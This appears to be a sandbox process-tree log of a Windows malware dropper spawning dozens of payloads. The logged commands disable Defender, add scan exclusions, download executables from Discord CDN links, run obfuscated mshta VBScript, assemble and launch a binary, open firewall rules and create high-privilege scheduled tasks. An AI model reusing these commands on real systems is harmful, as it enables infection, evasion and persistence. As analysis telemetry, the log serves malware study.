C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exeThu128b511c77e8c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exeC:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu123e05ebe43921.exeThu123e05ebe43921.exe5⤵
-
C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe"C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe"C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe"C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe"C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\B09C.bat "C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe""7⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686587866804244/18.exe" "18.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686616924925982/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\10532\Transmissibility.exeTransmissibility.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe"C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe"6⤵
-
C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe"C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe"C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe"C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe"C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "SkybIUiBuY9Jvjsk3zdQEIhJ.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe"C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe"C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe"C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x180,0x184,0x188,0xbc,0x18c,0x7ff757599e70,0x7ff757599e80,0x7ff757599e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,5854799455816390656,6244105331867913633,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11000_164015626" --mojo-platform-channel-handle=1680 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp" /SL5="$20752,506127,422400,C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe" /S /UID=270910⤵
-
C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe"C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe"C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe"C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exeC:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exeC:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso3F9A.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe"C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe"C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe"C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe"C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 7527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe"C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe"C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe"C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe"C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe"C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe"C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe"C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe"C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe"C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe"C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AQ_I3R69NJG_m4w14VMpsWDq.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe"C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2991246.exe"C:\Users\Admin\AppData\Roaming\2991246.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\3758203.exe"C:\Users\Admin\AppData\Roaming\3758203.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5396287.exe"C:\Users\Admin\AppData\Roaming\5396287.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6033949.exe"C:\Users\Admin\AppData\Roaming\6033949.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4936525.exe"C:\Users\Admin\AppData\Roaming\4936525.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\1426400.exe"C:\Users\Admin\AppData\Roaming\1426400.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe"C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2260 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2212 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1956 /prefetch:89⤵
-
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1944 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
